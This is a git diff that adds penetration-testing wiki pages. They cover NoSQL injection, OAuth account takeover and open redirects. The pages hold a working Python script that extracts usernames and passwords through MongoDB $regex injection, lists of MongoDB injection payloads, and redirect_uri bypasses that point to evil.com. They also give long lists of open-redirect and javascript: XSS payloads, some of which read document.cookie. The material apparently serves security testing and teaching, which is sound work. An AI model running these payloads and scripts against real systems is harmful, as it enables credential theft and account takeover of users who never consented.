+        if c not in ['*','+','.','?','|']:
+            payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
+            r = requests.post(u, data = {'ids': payload}, verify = False)
+            if 'OK' in r.text:
+                print("Found one more char : %s" % (password+c))
+                password += c
+```
+
+## MongoDB Payloads
+
+```text
+true, $where: '1 == 1'
+, $where: '1 == 1'
+$where: '1 == 1'
+', $where: '1 == 1'
+1, $where: '1 == 1'
+{ $ne: 1 }
+', $or: [ {}, { 'a':'a
+' } ], $comment:'successful MongoDB injection'
+db.injection.insert({success:1});
+db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
+|| 1==1
+' && this.password.match(/.*/)//+%00
+' && this.passwordzz.match(/.*/)//+%00
+'%20%26%26%20this.password.match(/.*/)//+%00
+'%20%26%26%20this.passwordzz.match(/.*/)//+%00
+{$gt: ''}
+[$ne]=1
+```
+
+## Tools
+
+* [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration)
+
+## Brute-force login usernames and passwords from POST login
+
+```python
+import requests
+import string
+
+url = "http://example.com"
+headers = {"Host": "exmaple.com"}
+cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}
+possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]
+def get_password(username):
+    print("Extracting password of "+username)
+    params = {"username":username, "password[$regex]":"", "login": "login"}
+    password = "^"
+    while True:
+        for c in possible_chars:
+            params["password[$regex]"] = password + c + ".*"
+            pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
+            if int(pr.status_code) == 302:
+                password += c
+                break
+        if c == possible_chars[-1]:
+            print("Found password "+password[1:].replace("\\", "")+" for username "+username)
+            return password[1:].replace("\\", "")
+
+def get_usernames():
+    usernames = []
+    params = {"username[$regex]":"", "password[$regex]":".*", "login": "login"}
+    for c in possible_chars:
+        username = "^" + c
+        params["username[$regex]"] = username + ".*"
+        pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
+        if int(pr.status_code) == 302:
+            print("Found username starting with "+c)
+            while True:
+                for c2 in possible_chars:
+                    params["username[$regex]"] = username + c2 + ".*"
+                    if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:
+                        username += c2
+                        print(username)
+                        break
+
+                if c2 == possible_chars[-1]:
+                    print("Found username: "+username[1:])
+                    usernames.append(username[1:])
+                    break
+    return usernames
+
+
+for u in get_usernames():
+    get_password(u)
+
+```
+
+## References
+
+{% file src="../.gitbook/assets/en-nosql-no-injection-ron-shulman-peleg-bronshtein-1.pdf" %}
+
+[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20injection)
+
diff --git a/pentesting-web/oauth-to-account-takeover.md b/pentesting-web/oauth-to-account-takeover.md
new file mode 100644
index 00000000..227e68e0
--- /dev/null
+++ b/pentesting-web/oauth-to-account-takeover.md
@@ -0,0 +1,128 @@
+# OAuth to Account takeover
+
+**This information was taken from** [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1)\*\*\*\*
+
+## “Quick” Primer <a id="d4a8"></a>
+
+There are a couple different versions, as well as grant types to consider when we talk about OAuth. To read about these, I recommend reading through [https://oauth.net/2/](https://oauth.net/2/) to get a baseline understanding. In this article, we will be focusing on the most common flow that you will come across today, which is the [OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/). In essence, OAuth provides developers an authorization mechanism to allow an application to access data or perform certain actions against your account, from another application \(the authorization server\).
+
+For example, let’s say website [https://yourtweetreader.com](https://yourtweetreader.com/) has functionality to display all tweets you’ve ever sent, including private tweets. In order to do this, OAuth 2.0 is introduced. [https://yourtweetreader.com](https://yourtweetreader.com/) will ask you to authorize their Twitter application to access all your Tweets. A consent page will pop up on [https://twitter.com](https://twitter.com/) displaying what permissions are being requested, and who the developer requesting it is. Once you authorize the request, [https://yourtweetreader.com](https://yourtweetreader.com/) will be able to access to your Tweets on behalf of you. Now, this was very high level, and there’s some complexity here. Taking this example, here’s a bit more details on the particular elements which are important to understand in an OAuth 2.0 context:
+
+**resource owner**: The `resource owner` is the user/entity granting access to their protected resource, such as their Twitter account Tweets
+
+**resource server**: The `resource server` is the server handling authenticated requests after the application has obtained an `access token` on behalf of the `resource owner` . In the above example, this would be https://twitter.com
+
+**client application**: The `client application` is the application requesting authorization from the `resource owner`. In this example, this would be https://yourtweetreader.com.
+
+**authorization server**: The `authorization server` is the server issuing `access tokens` to the `client application` after successfully authenticating the `resource owner` and obtaining authorization. In the above example, this would be [https://twitter.com](https://twitter.com/)
+
+**client\_id**: The `client_id` is the identifier for the application. This is a public, non-secret unique identifier.
+
+**client\_secret:** The `client_secret` is a secret known only to the application and the authorization server. This is used to generate `access_tokens`
+
+**response\_type**: The `response_type` is a value to detail which type of token is being requested, such as `code`
+
+**scope**: The `scope` is the requested level of access the `client application` is requesting from the `resource owner`
+
+**redirect\_uri**: The `redirect_uri` is the URL the user is redirected to after the authorization is complete. This usually must match the redirect URL that you have previously registered with the service
+
+**state**: The `state` parameter can persist data between the user being directed to the authorization server and back again. It’s important that this is a unique value as it serves as a CSRF protection mechanism if it contains a unique or random value per request
+
+**grant\_type**: The `grant_type` parameter explains what the grant type is, and which token is going to be returned
+
+**code**: This `code` is the authorization code received from the `authorization server` which will be in the query string parameter “code” in this request. This code is used in conjunction with the `client_id` and `client_secret` by the client application to fetch an `access_token`
+
+**access\_token**: The `access_token` is the token that the client application uses to make API requests on behalf of a `resource owner`
+
+**refresh\_token**: The `refresh_token` allows an application to obtain a new `access_token` without prompting the user
+
+Well, this was meant to be a quick primer but it seems with OAuth, you can’t simply give a brief description. Putting this all together, here is what a real OAuth flow looks like:
+
+1. You visit [https://yourtweetreader.com](https://yourtweetreader.com/) and click the “Integrate with Twitter” button.
+2. [https://yourtweetreader.com](https://yourtweetreader.com/) sends a request to [https://twitter.com](https://twitter.com/) asking you, the resource owner, to authorize https://yourtweetreader.com’s Twitter application to access your Tweets. The request will look like:
+
+```text
+https://twitter.com/auth
+ ?response_type=code
+ &client_id=yourtweetreader_clientId
+ &redirect_uri=https%3A%2F%2Fyourtweetreader.com%2Fcallback
+ &scope=readTweets
+ &state=kasodk9d1jd992k9klaskdh123
+```
+
+3. You will be prompted with a consent page:![](https://miro.medium.com/max/60/1*y66EY3Fn2qn-NPI9nhZC7A.png?q=20)![](https://miro.medium.com/max/1215/1*y66EY3Fn2qn-NPI9nhZC7A.png)
+
+4. Once accepted, Twitter will send a request back to the `redirect_uri` with the `code` and `state` parameters:
+
+```text
+https://yourtweetreader.com?code=asd91j3jd91j92j1j9d1&state=kasodk9d1jd992k9klaskdh123
+```
+
+5. [https://yourtweetreader.com](https://yourtweetreader.com/) will then take that `code` , and using their application’s `client_id` and `client_secret` , will make a request from the server to retrieve an `access_token` on behalf of you, which will allow them to access the permissions you consented to:
+
+```text
+POST /oauth/access_token
+Host: twitter.com
+...{"client_id": "yourtweetreader_clientId", "client_secret": "yourtweetreader_clientSecret", "code": "asd91j3jd91j92j1j9d1", "grant_type": "authorization_code"}
+```
+
+6. Finally, the flow is complete and [https://yourtweetreader.com](https://yourtweetreader.com/) will make an API call to Twitter with your `access_token` to access your Tweets.
+
+## Bug Bounty Findings <a id="323a"></a>
+
+Now, the interesting part! There are many things that can go wrong in an OAuth implementation, here are the different categories of bugs I frequently see:
+
+### Weak redirect\_uri configuration <a id="cc36"></a>
+
+This is probably one of the more common things everyone is aware of when looking for OAuth implementation bugs. The `redirect_uri` is very important because sensitive data, such as the `code` is appended to this URL after authorization. If the `redirect_uri` can be redirected to an attacker controlled server, this means the attacker can potentially takeover a victim’s account by using the `code` themselves, and gaining access to the victim’s data.
+
+The way this is going to be exploited is going to vary by authorization server. Some will only accept the exact same `redirect_uri` path as specified in the client application, but some will accept anything in the same domain or subdirectory of the `redirect_uri` .
+
+Depending on the logic handled by the server, there are a number of techniques to bypass a `redirect_uri` . In a situation where a `redirect_uri` is [https://yourtweetreader.com](https://yourtweetreader.com/)/callback, these include:
+
+* Open redirects: [`https://yourtweetreader.com`](https://yourtweetreader.com/)`/callback?redirectUrl=https://evil.com`
+* Path traversal: `https://yourtweetreader.com/callback/../redirect?url=https://evil.com`
+* Weak `redirect_uri` regexes: `https://yourtweetreader.com.evil.com`
+* HTML Injection and stealing tokens via referer header: `https://yourtweetreader.com/callback/home/attackerimg.jpg`
+
+### Improper handling of state parameter <a id="bda5"></a>
+
+This is by far the most common issue I see in OAuth implementations. Very often, the `state` parameter is completely omitted or used in the wrong way. If a state parameter is nonexistent, or a static value that never changes, the OAuth flow will very likely be vulnerable to CSRF. Sometimes, even if there is a `state` parameter, the application might not do any validation of the parameter and an attack will work. The way to exploit this would be to go through the authorization process on your own account, and pause right after authorizing. You will then come across a request such as:
+
+```text
+https://yourtweetreader.com?code=asd91j3jd91j92j1j9d1
+```
+
+After you receive this request, you can then drop the request because these codes are typically one-time use. You can then send this URL to a logged-in user, and it will add your account to their account. At first, this might not sound very sensitive since you are simply adding your account to a victim’s account. However, many OAuth implementations are for sign-in purposes, so if you can add your Google account which is used for logging in, you could potentially perform an Account Takeover with a single click as logging in with your Google account would give you access to the victim’s account.
+
+I’ve also seen the state parameter used as an additional redirect value several times. The application will use `redirect_uri` for the initial redirect, but then the `state` parameter as a second redirect which could contain the `code` within the query parameters, or referer header.
+
+One important thing to note is this doesn’t just apply to logging in and account takeover type situations. I’ve seen misconfigurations in:
+
+* Slack integrations allowing an attacker to add their Slack account as the recipient of all notifications/messages
+* Stripe integrations allowing an attacker to overwrite payment info and accept payments from the victim’s customers
+* PayPal integrations allowing an attacker to add their PayPal account to the victim’s account, which would deposit money to the attacker’s PayPal
+
+### Assignment of accounts based on email address <a id="ebe4"></a>
+
+One of the other more common issues I see is when applications allow “Sign in with X” but also username/password. There are 2 different ways to attack this:
+
+1. If the application does not require email verification on account creation, try creating an account with a victim’s email address and attacker password before the victim has registered. If the victim then tries to register or sign in with a third party, such as Google, it’s possible the application will do a lookup, see that email is already registered, then link their Google account to the attacker created account. This is a “pre account takeover” where an attacker will have access to the victim’s account if they created it prior to the victim registering.
+2. If an OAuth app does not require email verification, try signing up with that OAuth app with a victim’s email address. The same issue as above could exist, but you’d be attacking it from the other direction and getting access to the victim’s account for an account takeover.
+
+### Disclosure of Secrets <a id="e177"></a>
+
+It’s very important to recognize which of the many OAuth parameters are secret, and to protect those. For example, leaking the `client_id` is perfectly fine and necessary, but leaking the `client_secret` is dangerous. If this is leaked, the attacker can potentially use the trust and identity of the trusted client application to steal user `access_tokens` and private information/access for their integrated accounts. Going back to our earlier example, one issue I’ve seen is performing this step from the client, instead of the server:
+
+5. [https://yourtweetreader.com](https://yourtweetreader.com/) will then take that `code` , and using their application’s `client_id` and `client_secret` , will make a request from the server to retrieve an `access_token` on behalf of you, which will allow them to access the permissions you consented to.
+
+If this is done from the client, the `client_secret` will be leaked and users will be able to generate `access_tokens` on behalf of the application. With some social engineering, they can also add more scopes to the OAuth authorization and it will all appear legitimate as the request will come from the trusted client application.
+
+## Closing <a id="996f"></a>
+
+There’s plenty of other attacks and things that can go wrong in an OAuth implementation, but these are some of the more common ones that you will see. These misconfigurations are surprisingly common, and a very large quantity of bugs come from these. I intended to keep the “Quick Primer” rather short, but quickly realized all of the knowledge was necessary for the rest of the post. Given this, it makes sense that most developers aren’t going to know all the details for implementing securely. More often than not, these issues are high severity as it involves private data leak/manipulation and account takeovers. I’d like to go into more detail in each of these categories at some point, but wanted this to serve as a general introduction and give ideas for things to look out for!
+
+## OAuth providers Race Conditions
+
+If the platform you are testing is an OAuth provider ****[**read this to test for possible Race Conditions**](race-condition.md).
+
diff --git a/pentesting-web/open-redirect.md b/pentesting-web/open-redirect.md
new file mode 100644
index 00000000..f4b3a0a2
--- /dev/null
+++ b/pentesting-web/open-redirect.md
@@ -0,0 +1,728 @@
+# Open Redirect
+
+## Open redirect
+
+### Exploitation
+
+Using a whitelisted domain or keyword
+
+```text
+www.whitelisted.com.evil.com redirect to evil.com
+```
+
+Using "//" to bypass "http" blacklisted keyword
+
+```text
+//google.com
+```
+
+Using "https:" to bypass "//" blacklisted keyword
+
+```text
+https:google.com
+```
+
+Using "//" to bypass "//" blacklisted keyword \(Browsers see // as //\)
+
+```text
+\/\/google.com/
+/\/google.com/
+```
+
+Using "/\" to bypass:
+
+```text
+/\google.com
+```
+
+Using "%E3%80%82" to bypass "." blacklisted character
+
+```text
+//google%E3%80%82com
+```
+
+Using null byte "%00" to bypass blacklist filter
+
+```text
+//google%00.com
+```
+
+Using parameter pollution
+
+```text
+?next=whitelisted.com&next=google.com
+```
+
+Using "@" character, browser will redirect to anything after the "@"
+
+```text
+http://www.theirsite.com@yoursite.com/
+```
+
+Creating folder as their domain
+
+```text
+http://www.yoursite.com/http://www.theirsite.com/
+http://www.yoursite.com/folder/www.folder.com
+```
+
+XSS from Open URL - If it's in a JS variable
+
+```text
+";alert(0);//
+```
+
+XSS from data:// wrapper
+
+```text
+http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
+```
+
+Parsing
+
+```text
+http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
+List:
+① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾
+⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗
+⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰
+⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ
+Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ
+ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
+```
+
+### Open Redirect to XSS
+
+```bash
+#Basic payload, javascript code is executed after "javascript:"
+javascript:alert(1)
+
+#Bypass "javascript" word filter with CRLF
+java%0d%0ascript%0d%0a:alert(0)
+
+#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
+#This bypasses FILTER_VALIDATE_URL os PHP
+javascript://%250Aalert(1)
+
+#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
+javascript://%250Aalert(1)//?1
+javascript://%250A1?alert(1):0
+
+#Others
+%09Jav%09ascript:alert(document.domain)
+javascript://%250Alert(document.location=document.cookie)
+/%09/javascript:alert(1);
+/%09/javascript:alert(1)
+//%5cjavascript:alert(1);
+//%5cjavascript:alert(1)
+/%5cjavascript:alert(1);
+/%5cjavascript:alert(1)
+javascript://%0aalert(1)
+<>javascript:alert(1);
+//javascript:alert(1);
+//javascript:alert(1)
+/javascript:alert(1);
+/javascript:alert(1)
+\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
+javascript:alert(1);
+javascript:alert(1)
+javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
+javascript:confirm(1)
+javascript://https://whitelisted.com/?z=%0Aalert(1)
+javascript:prompt(1)
+jaVAscript://whitelisted.com//%0d%0aalert(1);//
+javascript://whitelisted.com?%a0alert%281%29
+/x:1/:///%01javascript:alert(document.cookie)/
+```
+
+### More domain bypasses
+
+```text
+<>//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+//;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+/////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+/////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
+////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+///\;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
+///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+//\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
+//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+/.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+/\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+/〱Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+\/\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+〱Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%00｡Ｐⓦ
+%01https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+%01https://google.com
+////%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+///%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+//%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+/%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+////%09/google.com
+///%09/google.com
+//%09/google.com
+/%09/google.com
+////%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+///%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+//%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+/%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+////%09/whitelisted.com@google.com
+///%09/whitelisted.com@google.com
+//%09/whitelisted.com@google.com
+/%09/whitelisted.com@google.com
+&%0d%0a1Location:https://google.com
+\152\141\166\141\163\143\162\151\160\164\072alert(1)
+%19Jav%09asc%09ript:https%20://whitelisted.com/%250Aconfirm%25281%2529
+////216.58.214.206
+///216.58.214.206
+//216.58.214.206
+/\216.58.214.206
+/216.58.214.206
+216.58.214.206
+////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
+///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
+////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
+///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
+//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
+////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
+///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
+//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
+%2f216.58.214.206//
+%2f216.58.214.206
+%2f216.58.214.206%2f%2f
+////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
+///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
+//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
+/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
+//%2f%2fⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+/%2f%2fⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+%2f$2f216.58.214.206
+$2f%2f216.58.214.206%2f%2f
+%2f$2f3627734734
+$2f%2f3627734734%2f%2f
+//%2f%2fgoogle.com
+/%2f%2fgoogle.com
+$2f%2fgoogle.com
+%2f$2fgoogle.com
+$2f%2fgoogle.com%2f%2f
+%2f3627734734//
+%2f3627734734
+%2f3627734734%2f%2f
+/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
+/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
+%2fgoogle.com//
+%2fgoogle.com
+%2fgoogle.com%2f%2f
+////3627734734
+///3627734734
+//3627734734
+/\3627734734
+/3627734734
+3627734734
+//3H6k7lIAiqjfNeN@whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+//3H6k7lIAiqjfNeN@whitelisted.com+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
+//3H6k7lIAiqjfNeN@whitelisted.com@google.com/
+//3H6k7lIAiqjfNeN@whitelisted.com+@google.com/
+////%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+///%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+//%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+////%5cgoogle.com
+///%5cgoogle.com
+//%5cgoogle.com
+/%5cgoogle.com
+////%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+///%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+//%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+/%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+////%5cwhitelisted.com@google.com
+///%5cwhitelisted.com@google.com
+//%5cwhitelisted.com@google.com
+/%5cwhitelisted.com@google.com
+/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
+%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
+%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
+//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ:80?@whitelisted.com/
+//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ:80#@whitelisted.com/
+";alert(0);//
+data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
+data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
+data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
+data:whitelisted.com;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
+//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%E3%80%82pw
+//google%00.com
+/\google%252ecom
+google%252ecom
+<>//google.com
+/<>//google.com
+//;@google.com
+///;@google.com
+/////google.com/
+/////google.com
+////\;@google.com
+////google.com//
+////google.com/
+////google.com
+///\;@google.com
+///google.com//
+///google.com/
+///google.com
+//\/google.com/
+//\google.com
+//google.com//
+//google.com/
+//google.com
+/.google.com
+/\/\/google.com/
+/\/google.com/
+/\/google.com
+/\google.com
+/〱google.com
+/google.com
+../google.com
+.google.com
+@google.com
+\/\/google.com/
+〱google.com
+google.com
+google.com%23@whitelisted.com
+////google.com/%2e%2e
+///google.com/%2e%2e
+//google.com/%2e%2e
+/google.com/%2e%2e
+//google.com/%2E%2E
+////google.com/%2e%2e%2f
+///google.com/%2e%2e%2f
+//google.com/%2e%2e%2f
+////google.com/%2f..
+///google.com/%2f..
+//google.com/%2f..
+//google.com/%2F..
+/google.com/%2F..
+////google.com/%2f%2e%2e
+///google.com/%2f%2e%2e
+//google.com/%2f%2e%2e
+/google.com/%2f%2e%2e
+//google.com//%2F%2E%2E
+//google.com:80?@whitelisted.com/
+//google.com:80#@whitelisted.com/
+google.com/.jpg
+//google.com\twhitelisted.com/
+//google.com/whitelisted.com
+//google.com\@whitelisted.com
+google.com/whitelisted.com
+//google%E3%80%82com
+/http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+/http:/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+http://;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+http://.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+http:/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+http:Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+http://00330.00072.0000326.00000316
+http:00330.00072.0000326.00000316
+http://00330.0x3a.54990
+http:00330.0x3a.54990
+http://00330.3856078
+http:00330.3856078
+http://0330.072.0326.0316
+http:0330.072.0326.0316
+http:%0a%0dⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
+http:%0a%0dgoogle.com
+http://0xd8.072.54990
+http:0xd8.072.54990
+http://0xd8.0x3a.0xd6.0xce
+http:0xd8.0x3a.0xd6.0xce
+http://0xd8.3856078
+http:0xd8.3856078
+http://0xd83ad6ce
+http:0xd83ad6ce
+http://[::216.58.214.206]
+http:[::216.58.214.206]
+http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ%23.whitelisted.com/
+http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ%2f%2f.whitelisted.com/
+http://3627734734
+http:3627734734
+http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ%3F.whitelisted.com/
+http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
+http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
+http://3H6k7lIAiqjfNeN@00330.0x3a.54990
+http:3H6k7lIAiqjfNeN@00330.0x3a.54990
+http://3H6k7lIAiqjfNeN@00330.3856078
+http:3H6k7lIAiqjfNeN@00330.3856078
+http://3H6k7lIAiqjfNeN@0330.072.0326.0316
+http:3H6k7lIAiqjfNeN@0330.072.0326.0316
+http://3H6k7lIAiqjfNeN@0xd8.072.54990
+http:3H6k7lIAiqjfNeN@0xd8.072.54990
+http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
+http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
+http://3H6k7lIAiqjfNeN@0xd8.3856078
+http:3H6k7lIAiqjfNeN@0xd8.3856078
